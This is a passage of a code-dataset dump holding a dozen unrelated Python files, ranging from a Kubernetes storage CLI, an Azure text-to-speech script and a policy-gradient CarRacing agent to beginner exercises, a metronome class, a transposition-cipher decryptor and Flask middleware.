= subparsers.add_parser(\"deleteRemoteBackupServer\",\n help=\"deleteRemoteBackupServer help\")\nparser_delete_remote_backup_server.add_argument(\"--remote\", required=True, metavar=\"[REMOTE]\", type=str,\n help=\"remote server host.\")\nparser_delete_remote_backup_server.add_argument(\"--port\", required=True, metavar=\"[PORT]\", type=str,\n help=\"remote server port.\")\nparser_delete_remote_backup_server.add_argument(\"--username\", required=True, metavar=\"[USERNAME]\", type=str,\n help=\"remote server username.\")\nparser_delete_remote_backup_server.add_argument(\"--password\", required=True, metavar=\"[PASSWORD]\", type=str,\n help=\"remote server password.\")\nparser_delete_remote_backup_server.add_argument(\"--pool\", required=True, metavar=\"[POOL]\", type=str,\n help=\"storage pool to use\")\n# set default func\nparser_delete_remote_backup_server.set_defaults(func=deleteRemoteBackupServerParser)\n\n# https://stackoverflow.com/questions/48648036/python-argparse-args-has-no-attribute-func\ntry:\n os.putenv('LANG', 'en_US.UTF-8')\n args = parser.parse_args()\n args.func(args)\nexcept TypeError:\n # print\"argument number not enough\"\n logger.debug(traceback.format_exc())\n\n","sub_path":"kubesds-adm.py","file_name":"kubesds-adm.py","file_ext":"py","file_size_in_byte":54614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"186642450","text":"class Car():\n def __init__(self):\n self.Name = \"\"\n self.Price = 0\n def setCar(self, name, price):\n self.Name = name\n self.Price = price\n\nnames = [\"car1\", \"car2\", \"car3\"]\nprices = [100, 10, 1]\ncars = []\n\nfor i in range(len(names)):\n car = Car()\n car.setCar(names[i], prices[i])\n cars.append(car)\n\nprint(len(cars))\n\nfor c in cars:\n print(c.Name, c.Price)","sub_path":"array/CarList.py","file_name":"CarList.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"151517321","text":"from flask import Flask, request, url_for, render_template\nimport speech_recognition as sr\n\napp = Flask(__name__)\nr = sr.Recognizer() \n\n@app.route('/')\ndef index():\n return render_template(\"index.html\")\n\n@app.route('/result', methods=['GET','POST'])\ndef uploader():\n if request.method == 'POST':\n f = request.files['mp3file']\n with sr.AudioFile(f) as source:\n audio = r.record(source) \n text = r.recognize_google(audio,language=\"my-MM\")\n return render_template(\"result.html\",audio=text )\n\nif __name__== '_main_':\n app.run()","sub_path":"app/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"472260620","text":"import requests\nimport os\nfrom os import environ\nfrom os.path import isdir\nfrom os import mkdir\nimport enum\nimport time\nfrom random import choice\nfrom baseClasses import genders , Countries, fileName\n\n\nvoices = {\n Countries.Australian : {\n genders.female : [\"en-AU-NatashaNeural\"],\n genders.male : [\"en-AU-WilliamNeural\"]\n },\n Countries.Indian : {\n genders.male :[\"en-IN-PrabhatNeural\"],\n genders.female:[\"en-IN-NeerjaNeural\"]\n },\n Countries.British : {\n genders.male: [\"en-GB-RyanNeural\"],\n genders.female : [\"en-GB-MiaNeural\",\"en-GB-LibbyNeural\"]\n },\n Countries.Irish : {\n genders.male : [\"en-IE-ConnorNeural\"],\n genders.female : [\"en-IE-EmilyNeural\"]\n },\n Countries.South_Africa : {\n genders.male : [\"en-ZA-LukeNeural\"],\n genders.female : [\"en-ZA-LeahNeural\"]\n },\n Countries.American : {\n genders.male : [\"en-US-GuyNeural\"],\n genders.female : [\"en-US-JennyNeural\",\"en-US-AriaNeural\"]\n },\n Countries.Canada : {\n genders.male : [\"en-CA-LiamNeural\"],\n genders.female : [\"en-CA-ClaraNeural\"]\n },\n #Countries.HongKong : { #To be kicked out , just clones of other voices\n # genders.male : [\"en-HK-SamNeural\"],\n # genders.female : [\"en-HK-YanNeural\"]\n # },\n Countries.Philippines : {\n genders.male : [\"en-PH-JamesNeural\"],\n genders.female : [\"en-PH-RosaNeural\"]\n },\n #Countries.Singapore : { #To be kicked out , just clones of other voices\n # genders.female : [\"en-SG-LunaNeural\"],\n # genders.male : [\"en-SG-WayneNeural\"]\n # }\n }\n\nssml_string =\"\"\"\n\n %s\n\n\"\"\"\n\nclass TextToSpeech(object):\n def __init__(self):\n self.subscription_key = environ[\"API_KEY\"]\n self.tts = None\n self.timestr = time.strftime(\"%Y%m%d-%H%M\")\n self.access_token = None\n self.get_token()\n\n '''\n The TTS endpoint requires an access token. This method exchanges your\n subscription key for an access token that is valid for ten minutes.\n '''\n def get_token(self):\n fetch_token_url = \"https://eastus.api.cognitive.microsoft.com/sts/v1.0/issueToken\"\n headers = {\n 'Ocp-Apim-Subscription-Key': self.subscription_key\n }\n response = requests.post(fetch_token_url, headers=headers)\n self.access_token = str(response.text)\n\n def synthesizeVoice(self,words:str,voice:str) -> bool :\n #time.sleep(1)\n #print(list(voices[country].keys()))\n #voice = choice(list(voices[country][gender]))\n i=2\n while i>=0 :\n body:str = ssml_string%(voice,words)\n\n base_url = 'https://eastus.tts.speech.microsoft.com/'\n path = 'cognitiveservices/v1'\n constructed_url = base_url + path\n headers = {\n 'Authorization': 'Bearer ' + self.access_token,\n 'Content-Type': 'application/ssml+xml',\n 'X-Microsoft-OutputFormat': 'riff-24khz-16bit-mono-pcm',\n 'User-Agent': 'HotwordGenerators'\n }\n\n response = requests.post(constructed_url, headers=headers, data=body)\n '''\n If a success response is returned, then the binary audio is written\n to file in your working directory. It is prefaced by sample and\n includes the date.\n '''\n if response.status_code == 200:\n filePath = fileName%(words,voice,\"AZURE\")\n with open(filePath+\".wav\", 'wb') as audio:\n audio.write(response.content)\n print(\"\\nStatus code: \" + str(response.status_code) + \"\\nYour TTS is ready for playback.\\n\")\n return\n else:\n if(response.status_code==429): #401\n print(\"+++++++++++++++++++++\")\n print(\"Hit the limit, starting delay of 15 sec\")\n print(\"+++++++++++++++++++++\")\n time.sleep(15)\n elif(response.status_code==401):\n print(\"#-#-#-#-#-#-#-#-#-#-#-\")\n print(\"Unauthourized!!, starting delay of 200 sec\")\n print(\"#-#-#-#-#-#-#-#-#-#-#-\")\n self.get_token()\n time.sleep(10)\n i-=1\n else:\n print(\"Some other error bitch\")\n i-=1\n print(\"\\nStatus code: \" + str(response.status_code) + \"\\nSomething went wrong. Check your subscription key and headers.\\n\")\n print(\"Reason: \" + str(response.reason) + \"\\n\")\n\n\nTTS_Engine:TextToSpeech = TextToSpeech()\n#TTS_Engine.synthesizeVoice(\"Hello world\",Countries.Indian)\n\ndef getAudioSample(word:str,voice:str):\n if(not os.path.isdir(f\"dataset/{word}\")):\n os.mkdir(f\"dataset/{word}\")\n TTS_Engine.synthesizeVoice(word,voice)\n\n\"\"\"\nfor country in voices.keys():\n synthesizeVoice(\"I am angelina jolie\",str(country)+\"_female.wav\",country,genders.female)\n synthesizeVoice(\"I am John Walker\",str(country)+\"_male.wav\",country,genders.male)\n\"\"\"\nif __name__==\"__main__\":\n getAudioSample(\"bread\",\"en-PH-JamesNeural\")","sub_path":"azure_tts.py","file_name":"azure_tts.py","file_ext":"py","file_size_in_byte":5503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"299598149","text":"\ndef squared(x):\n # local variable inside of the function\n # when inside a function you USUALLY cannot change global variables\n localvar = x*x\n return localvar\n\nglobalvar = 7\nthreeSquare = squared(3)\n\nprint(\"Num is \" + str(num))\nprint(\"threeSquare is \" + str(threeSquare))\n\n\n\n\n\n\n","sub_path":"Canfly/Lessons/8 Functions 2/Scope.py","file_name":"Scope.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"503502358","text":"# Ternary If Statements\n\na = 1\nb = 2\n\n\"bigger\" if a > b else \"smaller\"\n\nstudent_names = [\"Mark\", \"Danny\", \"Sue\"]\n\n# For loop\n\nfor name in student_names:\n print(\"student name is {0}\".format(name))\n\n\nfor index in range(10): # rang() function converts it into a list [0 - 9]\n x += 10\n print(\"The valuse of X is {0}\".format(x))\n\n# Break and continue\n\nfor name in student_names:\n if name == \"Bort\":\n # break\n continue\n print(\"Found him! \" + name)\n print(\"student name is {0}\".format(name))\n\n# While loop\n\nx = 0\nwhile x < 10:\n print(\"Count is {0}\".format(x))\n x += 1\n","sub_path":"pluralsight-python-getting-started/l3_01_if_loops_break_continue.py","file_name":"l3_01_if_loops_break_continue.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"41404948","text":"import argparse\n\nfrom detectron2.checkpoint import DetectionCheckpointer\nfrom detectron2.config import get_cfg\n\nfrom trainer import Trainer\nfrom trainer import setup\n\nap = argparse.ArgumentParser()\nap.add_argument('config_file')\nargs = ap.parse_args()\n\n\n# cfg = get_cfg()\n# cfg.merge_from_file(args.config_file)\ncfg = setup(args, freeze=False)\n\n# cfg.MODEL.WEIGHTS='weights/coco_personkp/model_final_a6e10b.pkl'\n# cfg.MODEL.WEIGHTS = 'weights/coco_personkp/model_final_a6e10b_anchor-removed.pkl'\ncfg.MODEL.WEIGHTS = 'weights/mask_deform/model_final_821d0b.pkl'\ncfg.MODEL.LOAD_PROPOSALS = False\ncfg.DATASETS.TRAIN = ()\ncfg.freeze()\n\nmodel = Trainer.build_model(cfg)\nprint(cfg.MODEL.WEIGHTS)\nDetectionCheckpointer(model).resume_or_load(cfg.MODEL.WEIGHTS)\n\npthfile = cfg.MODEL.WEIGHTS\nimport pickle\nwith open(pthfile, \"rb\") as f:\n data = pickle.load(f, encoding=\"latin1\")\n","sub_path":"try_load.py","file_name":"try_load.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"160454794","text":"import gym\nimport numpy as np\nfrom gym import spaces\n\nimport pygame\nfrom MarioGame.classes.Dashboard import Dashboard\nfrom MarioGame.classes.Level import Level\nfrom MarioGame.classes.Menu import Menu\nfrom MarioGame.classes.Sound import Sound\nfrom MarioGame.entities.Mario import Mario\nfrom MarioGame.main import windowSize\nfrom MarioGame.openCV import ImgExtract\nimport cv2\n\nfrom MarioGame.abs_filepath import ABS_PATH\n\n\nbutton_log = [\"left\", \"right\", \"up\", \"dash\"]\n\nclass BasicEnv(gym.Env):\n \"\"\"Custom environment Basic code\"\"\"\n metadata = {\"render.modes\": [\"human\"]}\n\n def __init__(self):\n super(BasicEnv, self).__init__()\n\n # 보상값을 설정함\n self.reward_range = (0, 1)\n # env.reward_range. 했을 때 출력하는 결과. reward를 조정함에 있어 이것도 변경해주는것이 좋음\n\n # 움직일 수 있는 방향을 의미함\n # https://github.com/LuterGS/OSSP1_RL/blob/Pygame/classes/Input.py 의 방향을 참고함.\n self.action_space = spaces.MultiDiscrete([1, 1, 1])\n # 각각 좌,우 / 점프 / 가속을 의미함\n\n # 볼 수 있는 환경을 의미함\n self.observation_space = spaces.Box(low=0, high=1, shape=(480, 640, ), dtype=np.float)\n # 최대/최소값이 1/0으로 정규화된 3차원 numpy array를 입력으로 받음, 현재 row, col은 123인데, 게임 보고 변경해야할듯\n\n # Mario Game import\n\n def reset(self):\n\n pygame.mixer.pre_init(44100, -16, 2, 4096)\n pygame.init()\n self.screen = pygame.display.set_mode(windowSize)\n self.max_frame_rate = 30\n self.dashboard = Dashboard(ABS_PATH + \"img/font.png\", 8, self.screen)\n self.sound = Sound()\n self.level = Level(self.screen, self.sound, self.dashboard)\n self.menu = Menu(self.screen, self.dashboard, self.level, self.sound)\n\n # 메뉴에서 게임 들어갈 때까지 메뉴 업데이트\n ctr = 0\n for i in range(2000):\n self.menu.update()\n # while not self.menu.start:\n # ctr += 1\n # self.menu.update()\n # print(ctr)\n\n # 1. 메뉴에서 게임 플레이로 들어감\n self.menu.key_input_status[4] = True\n self.menu.update()\n\n # random map 들어가는 부분\n # self.menu.key_input_status[3] = True\n # self.menu.update()\n\n self.menu.key_input_status[4] = True\n self.menu.update()\n\n # 2. 게임 플레이에서 레벨 선택\n # self.menu.key_input_status[5] = True\n # self.menu.update()\n\n self.mario = Mario(0, 0, self.level, self.screen, self.dashboard, self.sound)\n # mario.input.CUR_BUTTON_PRESSED 이런식으로 접근해야하는데...\n self.clock = pygame.time.Clock()\n\n # 게임은 프레임 단위로 나눔\n # 일단 1초간 기다리자.\n for i in range(self.max_frame_rate):\n if self.mario.pause:\n self.mario.pauseObj.update()\n else:\n self.level.drawLevel(self.mario.camera)\n self.dashboard.update()\n self.mario.update()\n pygame.display.update()\n self.clock.tick(self.max_frame_rate)\n\n # 그 이후에 observation을 받아오고\n observation = ImgExtract.Capture(self.screen, cv2.COLOR_BGR2GRAY)\n # print(observation)\n print(\"reset complete!\")\n\n # return 해줄 것.\n return observation\n\n def step(self, action):\n # agent의 action 결과를 받는다.\n # Multi-Discrete 환경이라서 어떻게 받는지는 모르겠지만, 일단 4개 numpy array를 받는다고 가정하자.\n # print(\"Action : \", action)\n button_pressed = [\n True if action[0] < 0 else False,\n True if action[0] >= 0 else False,\n False if action[1] < 0 else True,\n False if action[2] < 0 else True\n ]\n # print(action)\n # print(\"button : \", end=\" \")\n # for i in range(4):\n # if button_pressed[i]:\n # print(button_log[i] + \", \", end=\" \")\n # print(\"pressed\\n\")\n\n\n # action을 토대로 game에 입력을 줌 (30FPS 기준으로 이 입력이 0.2초동안, 즉 6프레임만큼 유지된다고 가정하자\n # -> 추후 변경 가능\n self.mario.input.CUR_BUTTON_PRESSED = button_pressed\n\n # 입력을 기반으로 게임 진행\n for i in range(6):\n if self.mario.pause:\n self.mario.pauseObj.update()\n else:\n self.level.drawLevel(self.mario.camera)\n self.dashboard.update()\n self.mario.update()\n pygame.display.update()\n self.clock.tick(self.max_frame_rate)\n\n # 이후에 observation을 받아옴\n observation = ImgExtract.Capture(self.screen, cv2.COLOR_BGR2GRAY)\n reward = -0.01 # 추후에 이미지 토대로 calculation 가능\n done = False\n\n # done check\n if self.mario.restart:\n print(\"restart requsted, reset in progress...\")\n done = True\n\n # return\n return observation, reward, done, None\n\n # self.game.getInput(action)\n\n # 이후 observation을 받음\n # observation = self.game.get_image()\n # done = self.game.is_finished()\n\n # 받은 observation을 토대로 reward 측정\n # reward = self.reward_calculation(observation)\n\n # 결과값 return\n # return observation, reward, done, {\"pressed\":, action}\n\n def reward(self, observation):\n reward = 0\n # 상의된 방식에 따라 observation에서 값을 뽑아내고, return.\n\n return reward\n\n def render(self, mode='human'):\n # 사람이 볼 수 있게끔 에이전트를 visualize 하는 부분\n # 필요 없을듯.\n pass\n\n def close(self):\n pass\n","sub_path":"RL/Environment/BasicGymEnv.py","file_name":"BasicGymEnv.py","file_ext":"py","file_size_in_byte":5954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"446647724","text":"#####################################################################\n#\n# metro.py\n#\n# Copyright (c) 2016, Eran Egozy\n#\n# Released under the MIT License (http://opensource.org/licenses/MIT)\n#\n#####################################################################\n\nfrom common.clock import kTicksPerQuarter, quantize_tick_up\n\nclass Metronome(object):\n \"\"\"Plays a steady click every beat.\n \"\"\"\n def __init__(self, sched, synth, channel = 0, patch=(128, 0), pitch = 60):\n super(Metronome, self).__init__()\n self.sched = sched\n self.synth = synth\n self.channel = channel\n self.patch = patch\n self.pitch = pitch\n self.beat_len = kTicksPerQuarter\n\n # run-time variables\n self.on_cmd = None\n self.off_cmd = None\n self.playing = False\n\n def start(self):\n if self.playing:\n return\n\n self.playing = True\n\n # set up the correct sound (program change)\n self.synth.program(self.channel, self.patch[0], self.patch[1])\n\n # find the tick of the next beat, and make it \"beat aligned\"\n now = self.sched.get_tick()\n next_beat = quantize_tick_up(now, self.beat_len)\n\n # now, post the _noteon function (and remember this command)\n self.on_cmd = self.sched.post_at_tick(next_beat, self._noteon)\n\n def stop(self):\n if not self.playing:\n return \n \n self.playing = False\n\n # in case there is a note on hanging, turn it off immediately\n if self.off_cmd:\n self.off_cmd.execute()\n\n # cancel anything pending in the future.\n self.sched.remove(self.on_cmd)\n self.sched.remove(self.off_cmd)\n\n # reset these so we don't have a reference to old commands.\n self.on_cmd = None\n self.off_cmd = None\n\n def toggle(self):\n if self.playing:\n self.stop()\n else:\n self.start()\n\n def _noteon(self, tick, ignore):\n # play the note right now:\n self.synth.noteon(self.channel, self.pitch, 100)\n\n # post the note off for half a beat later:\n self.off_cmd = self.sched.post_at_tick(tick + self.beat_len/2, self._noteoff, self.pitch)\n\n # schedule the next noteon for one beat later\n next_beat = tick + self.beat_len\n self.on_cmd = self.sched.post_at_tick(next_beat, self._noteon)\n\n def _noteoff(self, tick, pitch):\n # just turn off the currently sounding note.\n self.synth.noteoff(self.channel, pitch)\n","sub_path":"common/metro.py","file_name":"metro.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"351863637","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/donno/evernote.py\n# Compiled at: 2014-03-12 22:32:45\nimport os, sys, time\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom xml.etree import ElementTree as ET\nimport nltk, settings\n\ndef convert_time(src):\n normal_time = datetime.strptime(src, '%Y%m%dT%H%M%SZ')\n local_time = normal_time + timedelta(hours=8)\n return local_time\n\n\ndef convert_created_time(src):\n local_cre_time = convert_time(src)\n created = local_cre_time.strftime('%Y-%m-%d %H:%M:%S')\n created_file = local_cre_time.strftime('%y%m%d%H%M%S')\n return {'filename': created_file + '.mkd', 'content': created}\n\n\ndef convert_modified_time(src):\n local_mod_time = convert_time(src)\n return time.mktime(local_mod_time.timetuple())\n\n\ndef convert_content(src):\n \"\"\"Did not treat the leading spaces problem. Fix it in vim manually\"\"\"\n intstr = src.replace('
', '\\n')\n intstr = intstr.replace('
', '\\n')\n intstr = nltk.clean_html(intstr)\n intstr = intstr.replace('"', '\"')\n intstr = intstr.replace(''', \"'\")\n intstr = intstr.replace('&', '&')\n intstr = intstr.replace('<', '<')\n intstr = intstr.replace('>', '>')\n return intstr\n\n\ndef importnotes(source_file, dest_nb):\n if not os.path.exists(source_file):\n sys.exit('Source file does not exist')\n if not settings.valid_nb(dest_nb):\n sys.exit(settings.invalid_nb)\n tree = ET.parse(source_file)\n root = tree.getroot()\n for note in root:\n for t in note.iter('title'):\n title = t.text\n\n tags = []\n for t in note.iter('tag'):\n tags.append(t.text)\n\n alltags = (';').join(tags)\n for c in note.iter('content'):\n raw = c.text\n\n for c in note.iter('created'):\n created = c.text\n\n for u in note.iter('updated'):\n updated = u.text\n\n file_name = dest_nb + convert_created_time(created)['filename']\n with open(settings.repo + file_name, 'w') as (f):\n f.write('Title: ' + title.encode('utf8') + '\\n')\n f.write('Tags: ' + alltags.encode('utf8') + '\\n')\n f.write('Notebook: ' + dest_nb + '[t/j/o/y/c]\\n')\n f.write('Created: ' + convert_created_time(created)['content'] + '\\n')\n f.write('\\n------\\n\\n')\n f.write(convert_content(raw).encode('utf8'))\n last_modif = convert_modified_time(updated)\n os.utime(settings.repo + file_name, (last_modif, last_modif))","sub_path":"pycfiles/donno-0.1.15-py2.7/evernote.py","file_name":"evernote.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"653139634","text":"import gym\nimport math\nimport numpy as np\nimport os\nimport os.path as osp\nfrom collections import deque\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nfrom tensorboardX import SummaryWriter\n\nfrom ReplayMemory import ExperienceReplayMemory\nfrom WrapPytorch import WrapPytorch\n\nclass Config(object):\n GAMMA = 0.99\n LR = 0.002\n ENTROPY_BETA = 0.01\n MAX_FRAMES = 1000000\n\n device = (\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nclass PG_NN(nn.Module):\n def __init__(self, input_shape, action_dim, action_lim):\n '''\n action_lim: (2,action_dim)\n '''\n super(PG_NN, self).__init__()\n self.input_shape = input_shape\n self.action_dim = action_dim\n self.action_lim = action_lim\n self.conv1 = nn.Conv2d(input_shape[0], 32, kernel_size=4, stride=2)\n self.conv2 = nn.Conv2d(32, 64, kernel_size=3, stride=1)\n self.nn = nn.Sequential(\n nn.Linear(self.feature_size(), 64),\n nn.ReLU(),\n nn.Linear(64, action_dim),\n nn.Sigmoid()\n )\n\n def forward(self, x):\n if torch.cuda.is_available():\n action_range = torch.tensor(self.action_lim[0]-self.action_lim[1], device=Config.device, dtype=torch.float).view(self.action_dim)\n x = x.cuda()\n x = self.conv2(self.conv1(x))\n x = x.view(x.size(0), -1)\n return self.nn(x.cuda())*action_range\n x = x.float()\n x = self.conv2(self.conv1(x))\n x = x.view(x.size(0), -1)\n x = self.nn(x.float())\n\n return x\n\n def feature_size(self):\n return self.conv2(self.conv1(torch.zeros(1,*self.input_shape))).view(1,-1).size(1)\n\nclass PGAgent(object):\n def __init__(self, env, log_dir='./pg/1'):\n self.env = env\n self.log_dir = log_dir\n self.gamma = Config.GAMMA\n self.lr = Config.LR\n self.beta = Config.ENTROPY_BETA\n self.baseline = deque(maxlen=100000)\n self.device = Config.device\n\n self.declare_memory()\n self.declare_network()\n\n self.writer = SummaryWriter(log_dir=self.log_dir)\n\n def discounted_rewards(self, memories):\n disc_ret = np.zeros(len(memories))\n run_add = 0\n for t in reversed(range(len(memories))):\n if memories[t][-1]==True:\n run_add = 0\n run_add = run_add * self.gamma + memories[t][2]\n disc_ret[t] = run_add\n return disc_ret\n \n def get_action(self, s):\n if torch.cuda.is_available():\n return self.model(s).detach().cpu().view(self.env.action_space.shape)\n return self.model(s).cpu().view(self.env.action_space.shape)\n\n def declare_network(self):\n self.model = PG_NN(self.env.observation_space.shape, self.env.action_space.shape[0], [self.env.action_space.high,self.env.action_space.low])\n self.optimizer = optim.Adam(self.model.parameters(), self.lr)\n\n def declare_memory(self):\n self.memory = []\n\n def clear_memory(self):\n self.memory = []\n\n def store(self, s, a, r, s_, done):\n self.memory.append((s,a,r,s_,done))\n \n def update(self):\n loss = self.get_loss(self.memory)\n self.writer.add_scalar(\"data/loss\", loss, it)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n self.clear_memory()\n\n def get_loss(self, memory_vars):\n disc_rew = self.discounted_rewards(memory_vars)\n self.baseline.extend(disc_rew)\n disc_rew -= np.mean(self.baseline)\n acts = self.model(torch.tensor([e[0] for e in memory_vars]))\n disc_rew_t = torch.tensor(disc_rew, dtype=torch.float, device=self.device)\n log_softmax_t = torch.log(acts).view(-1,1)\n loss = -torch.mean(log_softmax_t*disc_rew_t).squeeze()\n\n return loss\n\n def load(self, model_path):\n self.model.load(torch.load(osp.join(model_path, \"model\")))\n self.optimizer.load(torch.load(osp.join(model_path, \"optim\")))\n\n def save(self, model_path):\n torch.save(self.model, osp.join(model_path,\"model\"))\n torch.save(self.optimizer, osp.join(model_path,\"optim\"))\n\n\nif __name__ == \"__main__\":\n env_id = \"CarRacing-v0\"\n log_dir = \"./pg/1\"\n if not osp.exists(log_dir):\n os.makedirs(log_dir)\n env = gym.make(env_id)\n # env = gym.wrappers.Monitor(env, osp.join(log_dir))\n env = WrapPytorch(env)\n\n agent = PGAgent(env, log_dir)\n obs = env.reset()\n it = 0\n for ep in range(Config.MAX_FRAMES):\n # env.render()\n action = agent.get_action(torch.tensor([obs], dtype=torch.float, device=agent.device)).detach().numpy()\n print(action)\n prev_obs = obs\n obs, reward, done, _ = env.step(action)\n agent.store(prev_obs, action, reward, obs, done)\n if done:\n agent.writer.add_scalar(\"data/reward\", reward, it)\n it += 1\n agent.update()\n if it % 10 == 0:\n agent.save(log_dir)\n print(\"episode\", it, \"reward:\", reward)\n obs = env.reset()\n\n env.close()\n agent.writer.close()\n","sub_path":"src/PG.py","file_name":"PG.py","file_ext":"py","file_size_in_byte":5167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"204354722","text":"import numpy as np\n\n\ndef dec(c, t):\n \"\"\"\n ---parameters---\n c : cipher text\n t : permutation rule\n \"\"\"\n t_inverse = np.argsort(t)\n print(t_inverse)\n split_number = len(t_inverse)\n len_c = len(c)\n split_c_by_len_t_inverse = [np.array(list(c[i:i+split_number])) for i in range(0, len_c, split_number)]\n \n plain_text = \"\"\n for c_element in split_c_by_len_t_inverse[:-1]:\n plain_text += \"\".join(c_element[t_inverse])\n\n len_split_c_tail = len(split_c_by_len_t_inverse[-1])\n print(len_split_c_tail)\n if len_split_c_tail < split_number:\n t_renew = np.argsort(np.array(list(filter(lambda x:x < len_split_c_tail, t))))\n print(t_renew)\n plain_text += \"\".join(split_c_by_len_t_inverse[-1][t_renew])\n else:\n plain_text += \"\".join(split_c_by_len_t_inverse[-1][t_renew])\n \n \n print(plain_text)\n\n\n\n\n\ndef main():\n print(\"---transposition cipher---\\ncipher text\")\n cipher_text = input().split()\n cipher_text = \"\".join(cipher_text)\n \n print(\"transposition rule\")\n permutation = list(map(int, input().split()))\n dec(cipher_text, permutation)\n \nif __name__ == \"__main__\":\n main()\n","sub_path":"classical-cipher/transposition-cipher/dec.py","file_name":"dec.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"136324928","text":"from flask import Request, Response, Flask\n\n\nclass middleware():\n \"\"\"\n Simple WSGI middleware for checking if the request to the API has a valid content type.\n \"\"\"\n\n def __init__(self, app: Flask):\n self.app = app.wsgi_app\n self.content_types = app.config.get('ALLOWED_CONTENT_TYPES')\n self.accept = ('application/json')\n\n def _parse_content_type(self, request_content_type: any) -> str:\n \"\"\"\n Content-Type := type \"/\" subtype *[\";\" parameter]\n https://tools.ietf.org/html/rfc1341\n \"\"\"\n parsed_content_type = ''\n\n if isinstance(request_content_type, str):\n parsed_content_type = request_content_type.split(';')[0] if request_content_type.find(\n ';') else request_content_type\n\n return parsed_content_type\n\n def __call__(self, environ, start_response):\n request = Request(environ)\n is_api_request = (request.path[1:4] == 'api')\n\n if is_api_request:\n content_type = self._parse_content_type(request.content_type)\n accept_mimetypes = request.accept_mimetypes.accept_json\n\n if content_type in self.content_types or accept_mimetypes:\n return self.app(environ, start_response)\n\n response = Response('{\"message\": \"Content type no valid\"}', mimetype='aplication/json',\n status=400)\n return response(environ, start_response)\n return self.app(environ, start_response)\n","sub_path":"app/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"154912035","text":"def distance(x1, y1, x2, y2):\n '''\n (float, float, float, float) -> float\n\n Calculates distance between point(x1, y1) and (x2, y2)\n '''\n import math\n d = math.sqrt((x2 - x1)**2 + (y2-y1)**2)\n return d\n\nwhile(True):\n d = input(\"Enter float coordinates of point A(x1, y1) and B(x2 y2)): \\n\").split()\n for el in range(len(d)):\n try:\n d[el] = float(d[el])\n print(d[el])\n except:\n print(\"An error occured.\")\n break\nab = distance(*d)\nprint(ab)","sub_path":"homework08/hw08_03.py","file_name":"hw08_03.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"355383804","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def __init__(self):\n self.min = -sys.maxsize-1\n self.max = sys.maxsize\n def largestBSTSubtree(self, root: 'TreeNode') -> 'int':\n if not root:\n return 0\n \n _, _, count = self.myLargestBSTSubtree(root)\n return count\n \n def myLargestBSTSubtree(self, root):\n if root.right and root.left:\n llow, lhigh, lcount = self.myLargestBSTSubtree(root.left)\n rlow, rhigh, rcount = self.myLargestBSTSubtree(root.right)\n if llow <= lhigh < root.val < rlow <= rhigh:\n return llow, rhigh, lcount + rcount + 1\n else:\n if lcount > rcount:\n return self.max, self.min, lcount\n else:\n return self.max, self.min, rcount\n elif not root.right and root.left:\n llow, lhigh, lcount = self.myLargestBSTSubtree(root.left)\n if llow <= lhigh < root.val:\n return llow, root.val, lcount + 1\n else:\n return self.max, self.min, lcount\n elif root.right and not root.left:\n rlow, rhigh, rcount = self.myLargestBSTSubtree(root.right)\n if root.val < rlow <= rhigh:\n return root.val, rhigh, rcount + 1\n else:\n return self.max, self.min, rcount\n else:\n return root.val, root.val, 1\n \n","sub_path":"333. Largest BST Subtree/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"159831089","text":"from wtforms import validators\nfrom wtforms import StringField\nfrom wtforms import Form\nfrom wtforms import TextAreaField\nfrom wtfnocaptcha.fields import NoCaptchaField\n\nfrom settings import RECAPTCHA_SITE_KEY\nfrom settings import RECAPTCHA_SECRET_KEY\n\n\nclass ContactForm(Form):\n email = StringField('Email Address',\n [validators.Email()])\n contact_text = TextAreaField(\n 'What the problem is?',\n [\n validators.Length(\n min=50,\n max=500,\n message=\"Please provide %(min)d - %(max)d \"\n \"characters\"),\n ]\n )\n nocaptcha = NoCaptchaField(\n public_key=RECAPTCHA_SITE_KEY,\n private_key=RECAPTCHA_SECRET_KEY,\n secure=True,\n # validator and error texts are already set in field.\n 